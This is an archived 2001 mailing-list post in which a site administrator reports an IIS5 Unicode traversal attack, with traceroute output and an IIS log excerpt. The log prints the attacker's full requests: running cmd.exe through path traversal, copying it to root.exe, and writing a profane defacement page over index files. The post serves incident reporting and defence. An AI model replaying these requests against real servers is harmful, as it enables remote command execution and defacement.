We had an attacker exploiting unicode on iis5 yesterday - see funny chinese-war-pages in the log below. The hacker successfully exploited IIS-Unicode bug, created ~100 files but was still too dumb to deface the webserver. The attacker used 208.22.161.15 and 202.97.205.3. I tried a trace but ended up with ... 19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [ 20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [ 21 200 ms 211 ms 220 ms 202.0.170.34 22 361 ms 370 ms 411 ms 202.0.170.13 23 370 ms 391 ms 400 ms 202.97.10.193 24 521 ms 541 ms 551 ms 202.97.10.66 25 581 ms 601 ms 581 ms 61.138.38.2 26 721 ms 711 ms 671 ms 61.180.139.202 27 341 ms 350 ms 351 ms 202.97.205.3 208.22.161.15 seems to end at 17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net [205.171.17.130] 18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net [205.171.17.82] 19 * * * Timeout.. .... Any chances to find out, to whom the two ip-adresses belong? Any tool that copies cmd.exe to root.exe? I liked this hack, because nothing happend and people her suddenly develop security-awareness. hence, even the servers i begged to secure for weeks are patched now. BTW it's a german website - nothing to do with an chinese-american spy-wars. funny hackerworld... thomas --- IIS-Logsnip --- 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - - 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - - 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - - 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color% 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22 ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i ndex.asp 502 355 423 - - - 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color% 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22 ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i ndex.htm 502 355 423 - - - Thomas Springer
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 18:54:07 PDT